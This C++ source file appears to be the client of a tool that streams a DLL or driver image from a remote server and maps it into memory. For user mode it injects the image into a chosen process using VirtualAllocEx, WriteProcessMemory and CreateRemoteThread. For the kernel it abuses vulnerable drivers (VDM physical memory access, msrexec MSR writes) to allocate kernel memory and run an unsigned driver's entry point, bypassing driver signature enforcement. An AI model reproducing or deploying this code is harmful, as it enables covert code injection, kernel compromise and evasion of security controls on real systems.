#include <ws2tcpip.h>
#include <Psapi.h>

#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <filesystem>
#include <fstream>
#include <iostream>
#include <map>
#include <memory>
#include <string>
#include <utility>
#include <vector>

#include "client.hpp"
#include "msrexec/msrexec.hpp"
#include "msrexec/vdm.hpp"
#include "vdm/vdm_ctx.hpp"

// symbol name -> { section number, offset within that section }, as read from a .map file.
using map_symbols_t = std::map<std::string, std::pair<std::uint32_t, std::uint32_t>>;
// one entry per map file: { module name (the map file's stem, I.E "ntoskrnl.exe"), its symbols }.
using extern_symbols_t = std::vector<std::pair<std::string, map_symbols_t>>;

// Parses a symbol map file into a map_symbols_t.
//
// Each symbol line is expected to look like
//     " SSSS:OOOOOOOOOOOOOOOO       SymbolName"
// i.e. a hexadecimal section number starting at column 1 and ending at the first ':',
// then 16 hexadecimal offset digits, 7 separator characters, and the symbol name,
// which runs to the end of the line.
//
// Parsing stops at the first line that contains no ':'. Lines that contain a ':' but
// are too short to hold a symbol name are skipped. A trailing '\r' (CRLF input read
// without line-ending translation) is dropped. Duplicate symbols: the last one wins.
//
// @param map_path path of the map file to read.
// @return the parsed symbols; empty if the file cannot be opened.
auto get_map_symbols(const std::string& map_path) -> map_symbols_t
{
	// layout of a symbol line, measured from the ':' separator...
	constexpr std::size_t offset_digits = 16u;
	constexpr std::size_t symbol_column = 1u + offset_digits + 7u;

	map_symbols_t result;
	std::ifstream map_file(map_path);
	if (!map_file.is_open())
		return result;

	std::string line;
	while (std::getline(map_file, line))
	{
		if (!line.empty() && line.back() == '\r')
			line.pop_back();

		const auto colon_index = line.find(':');
		if (colon_index == std::string::npos)
			break;

		// too short to contain a symbol name -- skip it instead of letting substr throw...
		if (line.length() <= colon_index + symbol_column)
			continue;

		// strtoul stops parsing at the ':' so the section field needs no exact length...
		const auto section_number = static_cast<std::uint32_t>(
			std::strtoul(line.substr(1, colon_index).c_str(), nullptr, 16));

		// map_symbols_t stores 32-bit offsets; larger values would be truncated here...
		const auto section_offset = static_cast<std::uint32_t>(
			std::strtoull(line.substr(colon_index + 1, offset_digits).c_str(), nullptr, 16));

		result.insert_or_assign(line.substr(colon_index + symbol_column),
			std::make_pair(section_number, section_offset));
	}
	return result;
}

int __cdecl main(int argc, char** argv)
{
	if (argc <= 5)
	{
		std::printf("[!] invalid usage... please review the following:\n");
		std::printf("\t> client.exe --ip 127.0.0.1 --port 1234 --DemoDll --pid 14234\n");
		std::printf("\t> client.exe --ip 127.0.0.1 --port 1234 --DemoImGui --pid 14234\n");
		std::printf("\t\t> --pid, provide a process id to inject into...\n");
		std::printf("\t\t> --ip, must be specific I.E 127.0.0.1...\n");
		std::printf("\t\t> --port, port number to connect too...\n");
		std::printf("\t\t> --DemoDll, streams demo dll...\n");
		std::printf("\t\t> --DemoImGui, streams demo imgui project...\n");
		std::printf("\t> client.exe --ip 127.0.0.1 --port 1234 --DemoDrv --MSREXEC --maps ntoskrnl.exe.map\n");
		std::printf("\t> client.exe --ip 127.0.0.1 --port 1234 --DemoDrv --VDM --maps ntoskrnl.exe.map\n");
		std::printf("\t\t> --pid, provide a process id to inject into...\n");
		std::printf("\t\t> --ip, must be specific I.E 127.0.0.1...\n");
		std::printf("\t\t> --MSREXEC, use MSREXEC to map the driver...\n");
		std::printf("\t\t> --VDM, use VDM to map the driver...\n");
		std::printf("\t\t> --maps, map files for unexported symbols...\n");
		std::printf("\t\t> --DemoDrv, maps demo driver into the kernel...\n");
		return -1;
	}

	int result{};
	SOCKET client_socket;
	WSADATA startup_data;
	ADDRINFOA addr_info, * addr_result = nullptr;
	memset(&addr_info, NULL, sizeof addr_info);

	if ((result = WSAStartup(MAKEWORD(2, 2), &startup_data)))
	{
		std::printf("[!] failed to startup wsa... reason = %d\n", result);
		return -1;
	}

	if ((result = getaddrinfo(argv[2], argv[4], &addr_info, &addr_result)))
	{
		std::printf("[!] failed to get address info = %s:%s, reason = %d\n",
			argv[2], argv[4], result);
		return -1;
	}

	if ((client_socket = socket(addr_result->ai_family,
		addr_result->ai_socktype, addr_result->ai_protocol)) == INVALID_SOCKET)
	{
		std::printf("[!] failed to create socket... reason = %d\n",
			WSAGetLastError());
		return -1;
	}

	if ((result = connect(client_socket, addr_result->ai_addr,
		addr_result->ai_addrlen)) == SOCKET_ERROR)
	{
		std::printf("[!] failed to connect to server... reason = %d\n", 
			WSAGetLastError());
		return -1;
	}

	std::printf("[+] connected to theo server (%s:%s)\n", 
		argv[2], argv[4]);

	theo::theo_data packet;
	packet.type = theo::theo_packet_type::init;

	// determine which file we are asking to map...
	for (auto idx = 0u; idx < argc; ++idx)
	{
		if (!strcmp(argv[idx], "--DemoDll"))
		{
			packet.file = theo::theo_file_type::demo_dll;
			break;
		}
		else if (!strcmp(argv[idx], "--DemoDrv"))
		{
			packet.file = theo::theo_file_type::demo_drv;
			break;
		}
		else if (!strcmp(argv[idx], "--DemoImGui"))
		{
			packet.file = theo::theo_file_type::demo_imgui;
			break;
		}
	}

	switch (packet.file)
	{
		case theo::theo_file_type::demo_dll:
		case theo::theo_file_type::demo_imgui:
		{
			std::uint32_t pid_offset = 0u, pid = 0u;
			for (auto idx = 3; idx < argc; ++idx)
				if (!strcmp(argv[idx], "--pid"))
					pid_offset = idx + 1;

			if (!pid_offset || !(pid = std::atoi(argv[pid_offset])))
			{
				std::printf("[!] invalid pid...\n");
				return -1;
			}

			const auto phandle =
				OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);

			if (phandle == INVALID_HANDLE_VALUE)
			{
				std::printf("[!] failed to open handle...\n");
				return -1;
			}

			theo::malloc_t _alloc = 
				[&](std::size_t size, std::uint32_t prot) -> void*
			{
				const auto result = 
					VirtualAllocEx
					(
						phandle,
						nullptr,
						size,
						MEM_COMMIT | MEM_RESERVE,
						prot
					);

				if (!result)
				{
					std::printf("[!] failed to allocate virtual memory...\n");
					exit(-1);
				}

				return result;
			};

			theo::memcpy_t _memcpy =
				[&](void* dest, const void* src, std::size_t size) -> void*
			{
				SIZE_T bytes_handled;
				if (!WriteProcessMemory(phandle, dest, src, size, &bytes_handled))
				{
					std::printf("[!] failed to write memory... reason = 0x%x\n", GetLastError());
					std::getchar();
				}
				return dest;
			};

			theo::resolve_symbol_t _resolver =
				[&](const char* symbol_name) -> std::uintptr_t
			{
				static std::map<std::string, std::uintptr_t> symbol_table;

				if (!symbol_table[symbol_name])
				{
					auto loaded_modules = std::make_unique<HMODULE[]>(64);
					std::uintptr_t result = 0u, loaded_module_sz = 0u;

					if (!EnumProcessModules(phandle,
						loaded_modules.get(), 512, (PDWORD)&loaded_module_sz))
						return {};

					for (auto i = 0u; i < loaded_module_sz / 8u; i++)
					{
						wchar_t file_name[MAX_PATH] = L"";
						if (!GetModuleFileNameExW(phandle,
							loaded_modules.get()[i], file_name, _countof(file_name)))
							continue;

						if ((result = reinterpret_cast<std::uintptr_t>(
							GetProcAddress(LoadLibraryW(file_name), symbol_name))))
							break;
					}

					symbol_table[symbol_name] = result;
					return result;
				}

				return symbol_table[symbol_name];
			};

			theo::client mapper(client_socket, packet, { _alloc, _memcpy, _resolver });
			std::printf("[+] streaming module...\n");

			const auto module_entry = 
				reinterpret_cast<LPTHREAD_START_ROUTINE>(
					mapper.handle());

			std::printf("[+] module entry -> 0x%p\n", module_entry);
			if (module_entry)
			{
				std::uint32_t tid = 0u;
				CreateRemoteThread(phandle, NULL,
					NULL, module_entry, NULL, NULL, (LPDWORD)&tid);
			}
			break;
		}
		case theo::theo_file_type::demo_drv:
		{
			std::uint32_t maps_offset = 0u;
			std::vector<std::pair<std::string, map_symbols_t>> extern_symbols;

			for (auto idx = 5; idx < argc; ++idx)
			{
				if (!strcmp(argv[idx], "--maps"))
				{
					maps_offset = idx + 1;
					break;
				}
			}

			if (maps_offset)
			{
				for (auto idx = maps_offset; idx <= argc - 1; ++idx)
				{
					extern_symbols.push_back
					({
						std::filesystem::path(argv[idx]).stem().string(),
							get_map_symbols(argv[idx])
					});
				}
			}

			std::printf("[+] number of map files = %d\n", extern_symbols.size());
			for (auto idx = 0u; idx < extern_symbols.size(); ++idx)
				std::printf("[+] %s number of symbols = %d\n", 
					extern_symbols[idx].first.c_str(), extern_symbols[idx].second.size());

			theo::resolve_symbol_t _kresolver =
				[&, &extern_symbols = extern_symbols](const char* symbol_name) -> std::uintptr_t
			{
				std::uintptr_t result = 0u;
				utils::kmodule::each_module
				(
					[&](PRTL_PROCESS_MODULE_INFORMATION drv_info, const char* drv_path) -> bool
					{
						const auto drv_name =
							reinterpret_cast<const char*>(
								drv_info->OffsetToFileName + drv_info->FullPathName);

						// false if we found the symbol...
						return (!(result = utils::kmodule::get_export(drv_name, symbol_name)));
					}
				);

				if (!result)
				{
					for (auto& [drv_name, drv_symbols] : extern_symbols)
					{
						// each kernel module... find a driver with a matching map file name...
						// I.E ntoskrnl.exe.map == ntoskrnl.exe...
						utils::kmodule::each_module
						(
							[&, &drv_name = drv_name, &drv_symbols = drv_symbols]
							(PRTL_PROCESS_MODULE_INFORMATION drv_info, const char* drv_path) -> bool
							{
								const auto _drv_name =
									reinterpret_cast<const char*>(
										drv_info->OffsetToFileName + drv_info->FullPathName);

								// if this is the driver, load it, loop over its sections
								// calc the absolute virtual address of the symbol...
								if (!strcmp(_drv_name, drv_name.c_str()))
								{
									const auto drv_load_addr =
										reinterpret_cast<std::uintptr_t>(
											LoadLibraryExA(drv_path, NULL, DONT_RESOLVE_DLL_REFERENCES));

									std::uint32_t section_count = 1u;
									utils::pe::each_section
									(
										[&, &drv_symbols = drv_symbols]
										(PIMAGE_SECTION_HEADER section_header, std::uintptr_t img_base) -> bool
										{
											if (section_count == drv_symbols[symbol_name].first)
											{
												result = reinterpret_cast<std::uintptr_t>(drv_info->ImageBase) +
													section_header->VirtualAddress + drv_symbols[symbol_name].second;

												// we found the symbol...
												return false;
											}

											++section_count;
											// keep going over sections...
											return true;
										}, drv_load_addr
									);
								}

								// keep looping over modules until we resolve the symbol...
								return !result;
							}
						);

						// if we found the symbol then break out of the loop... else keep looping...
						if (result) break;
					}
				}

				// finally return the result...
				return result;
			};

			for (auto idx = 0u; idx < argc; ++idx)
			{
				if (!strcmp(argv[idx], "--MSREXEC"))
				{
					const auto [drv_handle, drv_key, drv_status] = msrexec::load_drv();
					if (drv_status != STATUS_SUCCESS || drv_handle == INVALID_HANDLE_VALUE)
					{
						std::printf("> failed to load driver... reason -> 0x%x\n", drv_status);
						return -1;
					}

					writemsr_t _write_msr =
						[&](std::uint32_t key, std::uint64_t value) -> bool
					{
						return msrexec::writemsr(key, value);
					};

					vdm::msrexec_ctx msrexec(_write_msr);

					theo::malloc_t _kalloc = 
						[&](std::size_t size, std::uint32_t prot) -> void*
					{
						void* alloc_base;
						msrexec.exec
						(
							[&](void* krnl_base, get_system_routine_t get_kroutine) -> void
							{
								using ex_alloc_pool_t =
									void* (*)(std::uint32_t, std::size_t);

								const auto ex_alloc_pool =
									reinterpret_cast<ex_alloc_pool_t>(
										get_kroutine(krnl_base, "ExAllocatePool"));

								alloc_base = ex_alloc_pool(NULL, size);
							}
						);
						return alloc_base;
					};

					theo::memcpy_t _kmemcpy =
						[&](void* dest, const void* src, std::size_t size) -> void*
					{
						void* result = nullptr;
						msrexec.exec
						(
							[&](void* krnl_base, get_system_routine_t get_kroutine) -> void
							{
								const auto kmemcpy =
									reinterpret_cast<decltype(&memcpy)>(
										get_kroutine(krnl_base, "memcpy"));

								result = kmemcpy(dest, src, size);
							}
						);
						return result;
					};

					theo::client mapper(client_socket, packet, { _kalloc, _kmemcpy, _kresolver });
					std::printf("[+] streaming kernel module...\n");

					const auto module_entry =
						reinterpret_cast<LPTHREAD_START_ROUTINE>(
							mapper.handle());

					std::printf("[+] driver entry -> 0x%p\n", module_entry);
					std::getchar();

					if (module_entry)
					{
						int result;
						msrexec.exec([&result, drv_entry = module_entry]
							(void* krnl_base, get_system_routine_t get_kroutine) -> void
						{
							using drv_entry_t = int(*)();
							result = reinterpret_cast<drv_entry_t>(drv_entry)();
						});
					}

					const auto unload_status = msrexec::unload_drv(drv_handle, drv_key);
					if (unload_status != STATUS_SUCCESS)
					{
						std::printf("> failed to unload driver... reason -> 0x%x\n", unload_status);
						return -1;
					}
					break;
				}
				else if (!strcmp(argv[idx], "--VDM"))
				{
					const auto [drv_handle, drv_key, drv_status] = vdm::load_drv();
					if (drv_status != STATUS_SUCCESS || drv_handle == INVALID_HANDLE_VALUE)
					{
						std::printf("> failed to load driver... reason -> 0x%x\n", drv_status);
						return -1;
					}

					// read physical memory using the driver...
					vdm::read_phys_t _read_phys =
						[&](void* addr, void* buffer, std::size_t size) -> bool
					{
						return vdm::read_phys(addr, buffer, size);
					};

					// write physical memory using the driver...
					vdm::write_phys_t _write_phys =
						[&](void* addr, void* buffer, std::size_t size) -> bool
					{
						return vdm::write_phys(addr, buffer, size);
					};

					// use VDM to syscall into ExAllocatePool...
					vdm::vdm_ctx vdm(_read_phys, _write_phys);

					theo::malloc_t _kalloc = 
						[&](std::size_t size, std::uint32_t prot) -> void*
					{
						using ex_alloc_pool_t =
							void* (*)(std::uint32_t, std::uint32_t);

						static const auto ex_alloc_pool =
							reinterpret_cast<void*>(
								utils::kmodule::get_export(
									"ntoskrnl.exe", "ExAllocatePool"));

						return vdm.syscall<ex_alloc_pool_t>(ex_alloc_pool, NULL, size);
					};

					// use VDM to syscall into memcpy exported by ntoskrnl.exe...
					theo::memcpy_t _kmemcpy =
						[&](void* dest, const void* src, std::size_t size) -> void*
					{
						static const auto kmemcpy =
							reinterpret_cast<void*>(
								utils::kmodule::get_export(
									"ntoskrnl.exe", "memcpy"));

						return vdm.syscall<decltype(&memcpy)>(kmemcpy, dest, src, size);
					};

					theo::client mapper(client_socket, packet, { _kalloc, _kmemcpy, _kresolver });

					const auto module_entry =
						reinterpret_cast<LPTHREAD_START_ROUTINE>(
							mapper.handle());

					std::printf("[+] driver entry -> 0x%p\n", module_entry);
					std::getchar();

					if (module_entry)
					{
						// call driver entry... its up to you to do this using whatever method...
						// with VDM you can syscall into it... with msrexec you will use msrexec::exec...
						const auto entry_result =
							vdm.syscall<NTSTATUS(*)()>(
								reinterpret_cast<void*>(module_entry));
					}

					const auto unload_status = vdm::unload_drv(drv_handle, drv_key);
					if (unload_status != STATUS_SUCCESS)
					{
						std::printf("> failed to unload driver... reason -> 0x%x\n", unload_status);
						return -1;
					}
					break;
				}
			}
			break;
		}
		default:
		{
			std::printf("[!] invalid demo file option...\n");
			return -1;
		}
	}

	std::printf("[+] press enter to close...\n");
	std::getchar();
}